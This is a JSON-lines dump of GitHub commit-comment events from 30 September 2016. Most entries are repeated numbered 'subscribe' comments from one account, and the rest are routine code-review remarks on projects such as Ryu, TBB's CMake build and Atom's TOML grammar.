{"id":"4640832482","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234641,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:42:32Z","updated_at":"2016-09-30T00:42:32Z","body":"subscribe 63"}},"created_at":"2016-09-30T00:42:32Z"}
{"id":"4640833868","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234644,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:43:02Z","updated_at":"2016-09-30T00:43:02Z","body":"subscribe 64"}},"created_at":"2016-09-30T00:43:02Z"}
{"id":"4640834875","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234645,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:43:25Z","updated_at":"2016-09-30T00:43:25Z","body":"subscribe 65"}},"created_at":"2016-09-30T00:43:25Z"}
{"id":"4640836311","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234648,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:43:58Z","updated_at":"2016-09-30T00:43:58Z","body":"subscribe 66"}},"created_at":"2016-09-30T00:43:58Z"}
{"id":"4640836891","type":"CommitCommentEvent","actor":{"login":"vassago16"},"repo":{"name":"vassago16/FTC-APP-6547-2016"},"payload":{"comment":{"id":19234652,"position":null,"line":null,"path":null,"commit_id":"c76b3c406aca8517e445d38218503d3c02cebc25","created_at":"2016-09-30T00:44:10Z","updated_at":"2016-09-30T00:44:10Z","body":"Merge of changes to Main"}},"created_at":"2016-09-30T00:44:10Z"}
{"id":"4640837406","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234654,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:44:23Z","updated_at":"2016-09-30T00:44:23Z","body":"subscribe 67"}},"created_at":"2016-09-30T00:44:23Z"}
{"id":"4640838446","type":"CommitCommentEvent","actor":{"login":"mcczj"},"repo":{"name":"3roo/VagetableFactory"},"payload":{"comment":{"id":19234658,"position":null,"line":null,"path":null,"commit_id":"0dbfd4d7ee3d35cd3f6e42a03e3c17803466e532","created_at":"2016-09-30T00:44:46Z","updated_at":"2016-09-30T00:44:46Z","body":"添加十六进制换CRC"}},"created_at":"2016-09-30T00:44:46Z"}
{"id":"4640838508","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234659,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:44:47Z","updated_at":"2016-09-30T00:44:47Z","body":"subscribe 68"}},"created_at":"2016-09-30T00:44:47Z"}
{"id":"4640838739","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"shinpeimuraoka/ryu"},"payload":{"comment":{"id":19234660,"position":5,"line":430,"path":"ryu/ofproto/nicira_ext.py","commit_id":"07282e8e2ab742cb52132bf3a95faace691918e8","created_at":"2016-09-30T00:44:52Z","updated_at":"2016-09-30T00:44:52Z","body":"無理です。\r\n説明文の参照元から余分に貼り付けしてしまいました。\r\n削除します。"}},"created_at":"2016-09-30T00:44:52Z"}
{"id":"4640838813","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":19234661,"position":null,"line":null,"path":null,"commit_id":"83260fec79ca32e8e8ede26c38c818691d3a9f63","created_at":"2016-09-30T00:44:54Z","updated_at":"2016-09-30T00:44:54Z","body":"yikes :)"}},"created_at":"2016-09-30T00:44:54Z"}
{"id":"4640839752","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234662,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:45:14Z","updated_at":"2016-09-30T00:45:14Z","body":"subscribe 69"}},"created_at":"2016-09-30T00:45:14Z"}
{"id":"4640840833","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234663,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:45:39Z","updated_at":"2016-09-30T00:45:39Z","body":"subscribe 70"}},"created_at":"2016-09-30T00:45:39Z"}
{"id":"4640843310","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"shinpeimuraoka/ryu"},"payload":{"comment":{"id":19234667,"position":7,"line":432,"path":"ryu/ofproto/nicira_ext.py","commit_id":"07282e8e2ab742cb52132bf3a95faace691918e8","created_at":"2016-09-30T00:46:32Z","updated_at":"2016-09-30T00:46:32Z","body":"ドキュメント上、説明欄が横長になりすぎていますし\r\n例を記載しているのもIPv4、IPv6、MACと常識的なものですので、削除します。"}},"created_at":"2016-09-30T00:46:32Z"}
{"id":"4640847388","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"shinpeimuraoka/ryu"},"payload":{"comment":{"id":19234682,"position":null,"line":null,"path":null,"commit_id":"07282e8e2ab742cb52132bf3a95faace691918e8","created_at":"2016-09-30T00:48:05Z","updated_at":"2016-09-30T00:48:05Z","body":"`ofproto/nicira_ext: Add missing Nicira Extended Match fields`\r\nに修正します。"}},"created_at":"2016-09-30T00:48:05Z"}
{"id":"4640848361","type":"CommitCommentEvent","actor":{"login":"god"},"repo":{"name":"HannahMuetzel/CS3100-2_Project01"},"payload":{"comment":{"id":19234683,"position":null,"line":null,"path":null,"commit_id":"50284158737376806988d9e1873fdc042e55efe7","created_at":"2016-09-30T00:48:28Z","updated_at":"2016-09-30T00:48:28Z","body":"God works in mysterious ways."}},"created_at":"2016-09-30T00:48:28Z"}
{"id":"4640849596","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234687,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:48:56Z","updated_at":"2016-09-30T00:48:56Z","body":"subscribe 71"}},"created_at":"2016-09-30T00:48:56Z"}
{"id":"4640850758","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234690,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:49:21Z","updated_at":"2016-09-30T00:49:21Z","body":"subscribe 72"}},"created_at":"2016-09-30T00:49:21Z"}
{"id":"4640851697","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234692,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:49:44Z","updated_at":"2016-09-30T00:49:44Z","body":"subscribe 73"}},"created_at":"2016-09-30T00:49:44Z"}
{"id":"4640853013","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234695,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:50:11Z","updated_at":"2016-09-30T00:50:11Z","body":"subscribe 74"}},"created_at":"2016-09-30T00:50:11Z"}
{"id":"4640854958","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234699,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:50:48Z","updated_at":"2016-09-30T00:50:48Z","body":"subscribe 75"}},"created_at":"2016-09-30T00:50:48Z"}
{"id":"4640856411","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234705,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:51:20Z","updated_at":"2016-09-30T00:51:20Z","body":"subscribe 76"}},"created_at":"2016-09-30T00:51:20Z"}
{"id":"4640857594","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234708,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:51:47Z","updated_at":"2016-09-30T00:51:47Z","body":"subscribe 77"}},"created_at":"2016-09-30T00:51:47Z"}
{"id":"4640858818","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234714,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:52:16Z","updated_at":"2016-09-30T00:52:16Z","body":"subscribe 78"}},"created_at":"2016-09-30T00:52:16Z"}
{"id":"4640859165","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"shinpeimuraoka/ryu"},"payload":{"comment":{"id":19234716,"position":null,"line":null,"path":null,"commit_id":"07282e8e2ab742cb52132bf3a95faace691918e8","created_at":"2016-09-30T00:52:23Z","updated_at":"2016-09-30T00:52:23Z","body":"正式リリースされていないOVS 2.6系を記載してしまっているので本文を削除し、件名だけにします。\r\n設定可能となるOVSのバージョンを説明欄に記載しようかとも思いましたが、Ryuを使用するのはOVSだけではないのでやめておきます。"}},"created_at":"2016-09-30T00:52:23Z"}
{"id":"4640859952","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234718,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:52:39Z","updated_at":"2016-09-30T00:52:39Z","body":"subscribe 79"}},"created_at":"2016-09-30T00:52:39Z"}
{"id":"4640860840","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234725,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:53:00Z","updated_at":"2016-09-30T00:53:00Z","body":"subscribe 80"}},"created_at":"2016-09-30T00:53:00Z"}
{"id":"4640861852","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234733,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:53:24Z","updated_at":"2016-09-30T00:53:24Z","body":"subscribe 81"}},"created_at":"2016-09-30T00:53:24Z"}
{"id":"4640862667","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234735,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:53:45Z","updated_at":"2016-09-30T00:53:45Z","body":"subscribe 82"}},"created_at":"2016-09-30T00:53:45Z"}
{"id":"4640862765","type":"CommitCommentEvent","actor":{"login":"wowotech"},"repo":{"name":"wowotechX/build"},"payload":{"comment":{"id":19234736,"position":4,"line":4,"path":"script/fit_uImage_bubblegum.its","commit_id":"765988b92eecbc8bb689669001ea7c3a2fbbda82","created_at":"2016-09-30T00:53:47Z","updated_at":"2016-09-30T00:53:47Z","body":"可以把生成的头文件，保存到需要使用到的模块的目录下，如build/script、u-boot/include/configs，并将它们上传到代码仓库，这样就可以保证各个模块的独立性。"}},"created_at":"2016-09-30T00:53:47Z"}
{"id":"4640862988","type":"CommitCommentEvent","actor":{"login":"ophthal"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":19234737,"position":null,"line":null,"path":null,"commit_id":"83260fec79ca32e8e8ede26c38c818691d3a9f63","created_at":"2016-09-30T00:53:52Z","updated_at":"2016-09-30T00:53:52Z","body":"Git is not for the timid.  I keep trying and thank you for fixing everything when I break it. I think I learned something and fixed this...\r\n"}},"created_at":"2016-09-30T00:53:52Z"}
{"id":"4640863172","type":"CommitCommentEvent","actor":{"login":"smurph"},"repo":{"name":"smurph/Space-Game"},"payload":{"comment":{"id":19234739,"position":51,"line":69,"path":"Assets/Scripts/PlayerSpriteEditor.cs","commit_id":"fec29c95e085014c0f6e240c19a81a140cfd34e5","created_at":"2016-09-30T00:53:57Z","updated_at":"2016-09-30T00:53:57Z","body":"It should be noted that I have plans to make the mapping read from a config file. "}},"created_at":"2016-09-30T00:53:57Z"}
{"id":"4640863891","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234745,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:54:15Z","updated_at":"2016-09-30T00:54:15Z","body":"subscribe 83"}},"created_at":"2016-09-30T00:54:15Z"}
{"id":"4640864844","type":"CommitCommentEvent","actor":{"login":"kisoo-han"},"repo":{"name":"kisoo-han/cubrid"},"payload":{"comment":{"id":19234749,"position":null,"line":null,"path":null,"commit_id":"09a38b68e21ca6f6c2f0a4d5aa0bffa10416c725","created_at":"2016-09-30T00:54:37Z","updated_at":"2016-09-30T00:54:37Z","body":"Moved the comment to outside if-block."}},"created_at":"2016-09-30T00:54:37Z"}
{"id":"4640865040","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234750,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:54:42Z","updated_at":"2016-09-30T00:54:42Z","body":"subscribe 84"}},"created_at":"2016-09-30T00:54:42Z"}
{"id":"4640866729","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234754,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:55:17Z","updated_at":"2016-09-30T00:55:17Z","body":"subscribe 85"}},"created_at":"2016-09-30T00:55:17Z"}
{"id":"4640867967","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234757,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:55:45Z","updated_at":"2016-09-30T00:55:45Z","body":"subscribe 86"}},"created_at":"2016-09-30T00:55:45Z"}
{"id":"4640868285","type":"CommitCommentEvent","actor":{"login":"tinversenorm"},"repo":{"name":"adismiller/Project3_asm2992_sh44674"},"payload":{"comment":{"id":19234758,"position":null,"line":null,"path":null,"commit_id":"7847c4ae1d78b1488afa32dc2cd6759501279fb4","created_at":"2016-09-30T00:55:52Z","updated_at":"2016-09-30T00:55:52Z","body":"Committed by Pranav, since Adi's computer broke down"}},"created_at":"2016-09-30T00:55:52Z"}
{"id":"4640868939","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234762,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:56:05Z","updated_at":"2016-09-30T00:56:05Z","body":"subscribe 87"}},"created_at":"2016-09-30T00:56:05Z"}
{"id":"4640869923","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234763,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:56:27Z","updated_at":"2016-09-30T00:56:27Z","body":"subscribe 88"}},"created_at":"2016-09-30T00:56:27Z"}
{"id":"4640870730","type":"CommitCommentEvent","actor":{"login":"Alhadis"},"repo":{"name":"atom/language-toml"},"payload":{"comment":{"id":19234767,"position":5,"line":26,"path":"grammars/toml.cson","commit_id":"48b1690f2f1f3846f1c66ee24f0de81600295f16","created_at":"2016-09-30T00:56:46Z","updated_at":"2016-09-30T00:56:46Z","body":"Erh, what? The non-alphabetic characters that `\\w` covers (`[0-9_]`) are also included by this character class...\r\n\r\nThis isn't Perl, so `\\w` won't risk matching non-ASCII \"word\" characters like `ÉúîóΏ` or what-have-you."}},"created_at":"2016-09-30T00:56:46Z"}
{"id":"4640871005","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234768,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:56:53Z","updated_at":"2016-09-30T00:56:53Z","body":"subscribe 89"}},"created_at":"2016-09-30T00:56:53Z"}
{"id":"4640872185","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234770,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:57:18Z","updated_at":"2016-09-30T00:57:18Z","body":"subscribe 90"}},"created_at":"2016-09-30T00:57:18Z"}
{"id":"4640872495","type":"CommitCommentEvent","actor":{"login":"abettermap"},"repo":{"name":"CodeForFoco/bike-coop-theme"},"payload":{"comment":{"id":19234772,"position":null,"line":null,"path":null,"commit_id":"9801021514f2fcfdcc19178b0c8c0ef124f63735","created_at":"2016-09-30T00:57:25Z","updated_at":"2016-09-30T00:57:25Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Theme -- Footer](https://trello.com/c/4TDjLFY8/19-theme-footer)"}},"created_at":"2016-09-30T00:57:25Z"}
{"id":"4640873349","type":"CommitCommentEvent","actor":{"login":"hjmjohnson"},"repo":{"name":"wjakob/tbb"},"payload":{"comment":{"id":19234775,"position":5,"line":218,"path":"CMakeLists.txt","commit_id":"b3078a43c25b10ef3fbf5ee90a6de6f96bc47365","created_at":"2016-09-30T00:57:46Z","updated_at":"2016-09-30T00:57:46Z","body":"\r\n@wjakob \r\nThis is only valid syntax for cmake 2.8.12 or greater.\r\n\r\nif( ${CMAKE_VERSION} LESS 2.8.12 )\r\n    target_link_libraries(tbb LINK_PUBLIC pthread dl)\r\nelse()\r\n    target_link_libraries(tbb PUBLIC pthread dl)\r\nendif()\r\n"}},"created_at":"2016-09-30T00:57:46Z"}
{"id":"4640873463","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234777,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:57:48Z","updated_at":"2016-09-30T00:57:48Z","body":"subscribe 91"}},"created_at":"2016-09-30T00:57:48Z"}
{"id":"4640874802","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234781,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:58:19Z","updated_at":"2016-09-30T00:58:19Z","body":"subscribe 92"}},"created_at":"2016-09-30T00:58:19Z"}
{"id":"4640876010","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234788,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:58:48Z","updated_at":"2016-09-30T00:58:48Z","body":"subscribe 93"}},"created_at":"2016-09-30T00:58:48Z"}
{"id":"4640877323","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234794,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:59:18Z","updated_at":"2016-09-30T00:59:18Z","body":"subscribe 94"}},"created_at":"2016-09-30T00:59:18Z"}
{"id":"4640878296","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234796,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:59:41Z","updated_at":"2016-09-30T00:59:41Z","body":"subscribe 95"}},"created_at":"2016-09-30T00:59:41Z"}
{"id":"4640879583","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234801,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:00:08Z","updated_at":"2016-09-30T01:00:08Z","body":"subscribe 96"}},"created_at":"2016-09-30T01:00:08Z"}
{"id":"4640880754","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234807,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:00:32Z","updated_at":"2016-09-30T01:00:32Z","body":"subscribe 97"}},"created_at":"2016-09-30T01:00:32Z"}
{"id":"4640883086","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234818,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:01:21Z","updated_at":"2016-09-30T01:01:21Z","body":"subscribe 98"}},"created_at":"2016-09-30T01:01:21Z"}
{"id":"4640883957","type":"CommitCommentEvent","actor":{"login":"kenken1125"},"repo":{"name":"kenken1125/javascript"},"payload":{"comment":{"id":19234821,"position":4,"line":31,"path":"index.html","commit_id":"0376bcca8ff60c2aa10928414be186359545b987","created_at":"2016-09-30T01:01:40Z","updated_at":"2016-09-30T01:01:40Z","body":"ここはどうして変更したんですか？"}},"created_at":"2016-09-30T01:01:40Z"}
{"id":"4640884359","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234823,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:01:50Z","updated_at":"2016-09-30T01:01:50Z","body":"subscribe 99"}},"created_at":"2016-09-30T01:01:50Z"}
{"id":"4640885245","type":"CommitCommentEvent","actor":{"login":"50Wliu"},"repo":{"name":"atom/language-toml"},"payload":{"comment":{"id":19234826,"position":5,"line":26,"path":"grammars/toml.cson","commit_id":"48b1690f2f1f3846f1c66ee24f0de81600295f16","created_at":"2016-09-30T01:02:09Z","updated_at":"2016-09-30T01:02:09Z","body":"The specs beg to differ.  https://github.com/atom/language-toml/commit/48b1690f2f1f3846f1c66ee24f0de81600295f16#diff-8cc3a247c5cfc254a9b665024e526346R139 vs https://github.com/atom/language-toml/commit/48b1690f2f1f3846f1c66ee24f0de81600295f16#diff-8cc3a247c5cfc254a9b665024e526346R181"}},"created_at":"2016-09-30T01:02:09Z"}
{"id":"4640885404","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234827,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:02:13Z","updated_at":"2016-09-30T01:02:13Z","body":"subscribe 100"}},"created_at":"2016-09-30T01:02:13Z"}
{"id":"4640889020","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234834,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:03:34Z","updated_at":"2016-09-30T01:03:34Z","body":"subscribe 101"}},"created_at":"2016-09-30T01:03:34Z"}
{"id":"4640890174","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234835,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:04:01Z","updated_at":"2016-09-30T01:04:01Z","body":"subscribe 102"}},"created_at":"2016-09-30T01:04:01Z"}
{"id":"4640891318","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234843,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:04:30Z","updated_at":"2016-09-30T01:04:30Z","body":"subscribe 103"}},"created_at":"2016-09-30T01:04:30Z"}
{"id":"4640892423","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234846,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:04:56Z","updated_at":"2016-09-30T01:04:56Z","body":"subscribe 104"}},"created_at":"2016-09-30T01:04:56Z"}
{"id":"4640893466","type":"CommitCommentEvent","actor":{"login":"khipkin"},"repo":{"name":"zg/CSCWebsite"},"payload":{"comment":{"id":19234849,"position":null,"line":null,"path":null,"commit_id":"82f6af16aed547d0bb302aaf381f891db5727798","created_at":"2016-09-30T01:05:20Z","updated_at":"2016-09-30T01:05:20Z","body":"@zg As @chrissprague already said [here](https://github.com/rit-csc/CSCWebsite/issues/46#issue-180117390), we need to keep the actual pages so that existing links to them don't break."}},"created_at":"2016-09-30T01:05:20Z"}
{"id":"4640893502","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234850,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:05:20Z","updated_at":"2016-09-30T01:05:20Z","body":"subscribe 105"}},"created_at":"2016-09-30T01:05:20Z"}
{"id":"4640894395","type":"CommitCommentEvent","actor":{"login":"Alhadis"},"repo":{"name":"atom/language-toml"},"payload":{"comment":{"id":19234853,"position":5,"line":26,"path":"grammars/toml.cson","commit_id":"48b1690f2f1f3846f1c66ee24f0de81600295f16","created_at":"2016-09-30T01:05:42Z","updated_at":"2016-09-30T01:05:42Z","body":"Hrm, `first-mate` is running [Oniguruma](https://github.com/kkos/oniguruma/blob/master/doc/RE#L35) in Unicode mode? Interesting.\r\n\r\nWell then, carry on."}},"created_at":"2016-09-30T01:05:42Z"}
{"id":"4640894499","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234854,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:05:45Z","updated_at":"2016-09-30T01:05:45Z","body":"subscribe 106"}},"created_at":"2016-09-30T01:05:45Z"}
{"id":"4640895688","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234857,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:06:11Z","updated_at":"2016-09-30T01:06:11Z","body":"subscribe 107"}},"created_at":"2016-09-30T01:06:11Z"}
{"id":"4640896844","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234859,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:06:37Z","updated_at":"2016-09-30T01:06:37Z","body":"subscribe 108"}},"created_at":"2016-09-30T01:06:37Z"}
{"id":"4640897970","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234861,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:07:03Z","updated_at":"2016-09-30T01:07:03Z","body":"subscribe 109"}},"created_at":"2016-09-30T01:07:03Z"}
{"id":"4640899373","type":"CommitCommentEvent","actor":{"login":"Fryyyyy"},"repo":{"name":"Fryyyyy/Frytherer"},"payload":{"comment":{"id":19234863,"position":14,"line":502,"path":"frytherer.py","commit_id":"3fe77595d2847f735acb4467bcef97280741035d","created_at":"2016-09-30T01:07:31Z","updated_at":"2016-09-30T01:07:31Z","body":"Let's call the dict something better"}},"created_at":"2016-09-30T01:07:31Z"}
{"id":"4640899494","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234864,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:07:34Z","updated_at":"2016-09-30T01:07:34Z","body":"subscribe 110"}},"created_at":"2016-09-30T01:07:34Z"}
{"id":"4640900670","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234867,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:08:00Z","updated_at":"2016-09-30T01:08:00Z","body":"subscribe 111"}},"created_at":"2016-09-30T01:08:00Z"}
